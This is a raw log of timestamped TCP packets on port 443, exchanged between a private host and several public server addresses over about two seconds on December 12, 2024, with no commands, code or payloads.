Dec 12, 2024 22:40:36.923067093 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.929071903 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.929110050 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.929122925 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.932513952 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.932559013 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.932574034 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.938842058 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.938905954 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.938920021 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.942234993 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.942284107 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.942297935 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.949081898 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.949141979 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.949153900 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.951714039 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.951895952 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.951909065 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.958278894 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.958350897 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.958364964 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.961036921 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.961086035 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.961098909 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.967376947 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.967433929 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.967447042 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.970192909 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.970236063 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.970251083 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.990664959 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.990756989 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.990770102 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.991405964 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.991503000 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.991513968 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.993041039 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.993098021 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.993110895 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.996030092 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.996072054 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.996083021 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.997562885 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.997637987 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.997648954 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.998954058 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.999068022 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.999079943 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.005110979 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.005161047 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.005172968 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.006795883 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.006844044 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.006855965 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.010648012 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.010694981 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.010709047 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.014578104 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.014631987 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.014645100 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.017982006 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.018057108 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.018076897 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.021380901 CET	49822	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:37.021445036 CET	443	49822	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:37.021709919 CET	49822	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:37.021733999 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.021821022 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.021863937 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.021877050 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.021912098 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.022933960 CET	49822	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:37.022964001 CET	443	49822	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:37.025695086 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.028848886 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.028893948 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.028906107 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.032013893 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.032068014 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.032080889 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.035330057 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.035370111 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.035383940 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.038753986 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.038825989 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.038837910 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.042004108 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.042064905 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.042083025 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.045294046 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.045355082 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.045375109 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.048693895 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.048764944 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.048784971 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.051670074 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.051714897 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.051731110 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.054728985 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.054789066 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.054799080 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.054812908 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.054856062 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.057765007 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.060688972 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.060790062 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.060831070 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.060853004 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.061012030 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.063694954 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.066575050 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.066701889 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.066709995 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.066715956 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.066760063 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.069603920 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.074770927 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.074819088 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.074825048 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.075584888 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.075633049 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.075638056 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.080267906 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.080377102 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.080410004 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.080415964 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.080569029 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.085429907 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.085943937 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.085982084 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.085989952 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.095745087 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.095808983 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.095839024 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.095844984 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.095889091 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.096126080 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.097273111 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.097330093 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.097335100 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.110234022 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.110294104 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.110299110 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.110754967 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.110816002 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.110822916 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.111988068 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.112045050 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.112051964 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.124885082 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.124944925 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.124949932 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.124964952 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.125041962 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.125597954 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.126724005 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.126794100 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.126801014 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.141135931 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.141196966 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.141244888 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.141254902 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.141304970 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.141551971 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.142734051 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.142807007 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.142815113 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.153095961 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.153158903 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.153191090 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.153198957 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.153244972 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.153604031 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.154778004 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.154865980 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.154872894 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.168296099 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.168379068 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.168387890 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.168783903 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.168833971 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.168839931 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.169811964 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.169857025 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.169863939 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.176543951 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.176589966 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.176623106 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.176630974 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.176671028 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.176899910 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.177891016 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.178134918 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.178141117 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.188647032 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.188698053 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.188704967 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.189795017 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.189862967 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.189863920 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.189883947 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.189980030 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.190753937 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.202692986 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.202786922 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.202792883 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.203164101 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.203227997 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.203233957 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.204083920 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.204147100 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.204154968 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.213932991 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.213993073 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.214000940 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.214217901 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.214268923 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.214274883 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.215126038 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.215173006 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.215178967 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.224208117 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.224280119 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.224301100 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.224550009 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.224596024 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.224605083 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.226097107 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.226167917 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.226178885 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.234278917 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.234353065 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.234375000 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.234678030 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.234740019 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.234745979 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.235464096 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.235512972 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.235519886 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.235838890 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.235886097 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.236062050 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.288005114 CET	443	49806	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:37.291039944 CET	443	49806	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:37.291110992 CET	49806	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:37.291251898 CET	49806	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:37.291268110 CET	443	49806	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:37.529233932 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.529578924 CET	443	49817	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.560221910 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.560260057 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.560411930 CET	49817	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.560430050 CET	443	49817	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.560816050 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.561088085 CET	443	49817	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.603195906 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.603360891 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.603482962 CET	49817	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.603673935 CET	443	49817	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.603945971 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.603995085 CET	49817	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:37.647327900 CET	443	49817	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.647331953 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.701514959 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:37.755266905 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:37.805481911 CET	443	49820	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:37.857125044 CET	49820	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.162091017 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.162113905 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.162266016 CET	49820	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.162287951 CET	443	49820	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.163294077 CET	443	49820	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.163305998 CET	443	49820	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.163371086 CET	49820	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.163728952 CET	49820	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.163780928 CET	443	49820	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.164005995 CET	49820	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.164012909 CET	443	49820	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.165932894 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.165971994 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.166018009 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.166325092 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.166522980 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.166704893 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.166733980 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.223578930 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.223624945 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.223660946 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.223687887 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.223691940 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.223726988 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.223747969 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.230906963 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.230992079 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.231029034 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.231045008 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.231190920 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.237195015 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.249399900 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.249494076 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.249505997 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.334906101 CET	443	49817	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.334963083 CET	443	49817	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.335046053 CET	49817	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.335071087 CET	443	49817	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.335159063 CET	443	49817	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.335248947 CET	49817	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.348720074 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.348855972 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.348881006 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.364744902 CET	49820	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.364809990 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.413244009 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.413317919 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.413336992 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.421983004 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.422041893 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.422050953 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.427946091 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.428018093 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.428025961 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.441718102 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.441770077 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.441781044 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.455293894 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.455337048 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.455346107 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.456217051 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.456332922 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.496253014 CET	49817	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.496288061 CET	443	49817	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.641253948 CET	49816	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:38.641299009 CET	443	49816	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:38.672694921 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.672826052 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.672873020 CET	49819	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:38.672888994 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.672986984 CET	443	49819	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:38.673031092 CET	49819	443	192.168.2.5	172.217.17.78
